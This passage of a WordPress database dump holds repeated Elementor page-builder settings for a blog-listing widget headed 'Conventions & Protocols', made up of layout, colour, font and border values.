fa-check-circle\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_category\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"arrow_type\":\"fa fa-angle-double-left\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"get_permalink\",\"date_format\":\"F j, Y\"}],\"heading_title_color\":\"#000000\",\"heading_title_typography_typography\":\"custom\",\"heading_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"hidden_items_icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_color\":\"#ffffff\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"terms_link_typography_font_weight\":\"700\",\"terms_link_text_decor\":\"underline\",\"terms_link_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"arrows_style_popover_toggle\":\"custom\",\"arrows_style_box_font_color\":\"#000000\",\"arrows_style_box_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(11628,1891,'_elementor_edit_mode','builder'),(11629,1891,'_elementor_template_type','wp-page'),(11630,1891,'_elementor_version','2.7.5'),(11631,1891,'_wp_page_template','default'),(11632,1891,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"1\",\"posts_rows\":\"5\",\"image_size\":\"full\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"meta_position\":\"after-excerpt\",\"show_date_icon\":\"fa fa-check-circle\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_category\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"arrow_type\":\"fa fa-angle-double-left\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"get_permalink\",\"date_format\":\"F j, Y\"}],\"heading_title_color\":\"#000000\",\"heading_title_typography_typography\":\"custom\",\"heading_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"hidden_items_icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_title_color\":\"#000000\",\"post_text_color\":\"#c4c4c4\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_color\":\"#ffffff\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"terms_link_typography_font_weight\":\"700\",\"terms_link_text_decor\":\"underline\",\"terms_link_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"arrows_style_popover_toggle\":\"custom\",\"arrows_style_box_font_color\":\"#000000\",\"arrows_style_box_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(11635,1892,'_elementor_edit_mode','builder'),(11636,1892,'_elementor_template_type','wp-page'),(11637,1892,'_elementor_version','2.7.5'),(11638,1892,'_wp_page_template','default'),(11639,1892,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"1\",\"posts_rows\":\"5\",\"image_size\":\"full\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"meta_position\":\"after-excerpt\",\"show_date_icon\":\"fa fa-check-circle\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_category\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"arrow_type\":\"fa fa-angle-double-left\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"get_permalink\",\"date_format\":\"F j, Y\"}],\"heading_title_color\":\"#000000\",\"heading_title_typography_typography\":\"custom\",\"heading_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"hidden_items_icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_title_color\":\"#000000\",\"post_text_color\":\"#c4c4c4\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"terms_link_color\":\"#ffffff\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"terms_link_typography_font_weight\":\"700\",\"terms_link_text_decor\":\"underline\",\"terms_link_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"arrows_style_popover_toggle\":\"custom\",\"arrows_style_box_font_color\":\"#000000\",\"arrows_style_box_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(11643,1893,'_elementor_edit_mode','builder'),(11644,1893,'_elementor_template_type','wp-page'),(11645,1893,'_elementor_version','2.7.5'),(11646,1893,'_wp_page_template','default'),(11647,1893,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"1\",\"posts_rows\":\"5\",\"image_size\":\"full\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"meta_position\":\"after-excerpt\",\"show_date_icon\":\"fa fa-check-circle\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_category\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"arrow_type\":\"fa fa-angle-double-left\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"get_permalink\",\"date_format\":\"F j, Y\"}],\"heading_title_color\":\"#000000\",\"heading_title_typography_typography\":\"custom\",\"heading_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"hidden_items_icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"post_title_typography_font_weight\":\"700\",\"post_title_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]},\"post_text_color\":\"rgba(84,89,95,0.61)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"terms_link_color\":\"#ffffff\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"terms_link_typography_font_weight\":\"700\",\"terms_link_text_decor\":\"underline\",\"terms_link_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"arrows_style_popover_toggle\":\"custom\",\"arrows_style_box_font_color\":\"#000000\",\"arrows_style_box_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(11661,1899,'_elementor_edit_mode','builder'),(11662,1899,'_elementor_template_type','wp-page'),(11663,1899,'_elementor_version','2.7.5'),(11664,1899,'_wp_page_template','default'),(11665,1899,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"1\",\"posts_rows\":\"5\",\"image_size\":\"full\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"meta_position\":\"after-excerpt\",\"show_date_icon\":\"fa fa-check-circle\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_category\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"arrow_type\":\"fa fa-angle-double-left\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"get_permalink\",\"date_format\":\"F j, Y\"}],\"heading_title_color\":\"#000000\",\"heading_title_typography_typography\":\"custom\",\"heading_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"post_title_typography_font_weight\":\"700\",\"post_title_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]},\"post_text_color\":\"rgba(84,89,95,0.61)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"terms_link_color\":\"#ffffff\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"terms_link_typography_font_weight\":\"700\",\"terms_link_text_decor\":\"underline\",\"terms_link_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"arrows_style_popover_toggle\":\"custom\",\"arrows_style_box_font_color\":\"#000000\",\"arrows_style_box_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"posts_wrapper_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"posts_list_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"filter_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"hidden_item_border_active_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_border_border\":\"solid\",\"featured_post_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(11668,1900,'_elementor_edit_mode','builder'),(11669,1900,'_elementor_template_type','wp-page'),(11670,1900,'_elementor_version','2.7.5'),(11671,1900,'_wp_page_template','default'),(11672,1900,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"1\",\"posts_rows\":\"5\",\"image_size\":\"full\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"meta_position\":\"after-excerpt\",\"show_date_icon\":\"fa fa-check-circle\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_category\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"arrow_type\":\"fa fa-angle-double-left\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"get_permalink\",\"date_format\":\"F j, Y\"}],\"heading_title_color\":\"#000000\",\"heading_title_typography_typography\":\"custom\",\"heading_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"post_title_typography_font_weight\":\"700\",\"post_title_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]},\"post_text_color\":\"rgba(84,89,95,0.61)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"terms_link_color\":\"#ffffff\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"terms_link_typography_font_weight\":\"700\",\"terms_link_text_decor\":\"underline\",\"terms_link_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"arrows_style_popover_toggle\":\"custom\",\"arrows_style_box_font_color\":\"#000000\",\"arrows_style_box_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"posts_wrapper_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"posts_list_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"filter_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"hidden_item_border_active_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_border_border\":\"solid\",\"featured_post_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"post_border_border\":\"solid\",\"post_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"post_border_color\":\"rgba(122,122,122,0.48)\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(11675,1901,'_elementor_edit_mode','builder'),(11676,1901,'_elementor_template_type','wp-page'),(11677,1901,'_elementor_version','2.7.5'),(11678,1901,'_wp_page_template','default'),(11679,1901,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"1\",\"posts_rows\":\"5\",\"image_size\":\"full\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"meta_position\":\"after-excerpt\",\"show_date_icon\":\"fa fa-check-circle\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_category\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"arrow_type\":\"fa fa-angle-double-left\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"get_permalink\",\"date_format\":\"F j, Y\"}],\"heading_title_color\":\"#000000\",\"heading_title_typography_typography\":\"custom\",\"heading_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"post_title_typography_font_weight\":\"700\",\"post_title_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]},\"post_text_color\":\"rgba(84,89,95,0.61)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"terms_link_color\":\"#ffffff\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"terms_link_typography_font_weight\":\"700\",\"terms_link_text_decor\":\"underline\",\"terms_link_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"arrows_style_popover_toggle\":\"custom\",\"arrows_style_box_font_color\":\"#000000\",\"arrows_style_box_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"posts_wrapper_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"posts_list_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"filter_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"hidden_item_border_active_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_border_border\":\"solid\",\"featured_post_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"post_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"post_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"post_content_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"post_border_border\":\"double\",\"post_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"post_border_color\":\"rgba(122,122,122,0.48)\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(11683,1902,'_elementor_edit_mode','builder'),(11684,1902,'_elementor_template_type','wp-page'),(11685,1902,'_elementor_version','2.7.5'),(11686,1902,'_wp_page_template','default'),(11687,1902,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"1\",\"posts_rows\":\"5\",\"image_size\":\"full\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"meta_position\":\"after-excerpt\",\"show_date_icon\":\"fa fa-check-circle\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_category\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"arrow_type\":\"fa fa-angle-double-left\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"get_permalink\",\"date_format\":\"F j, 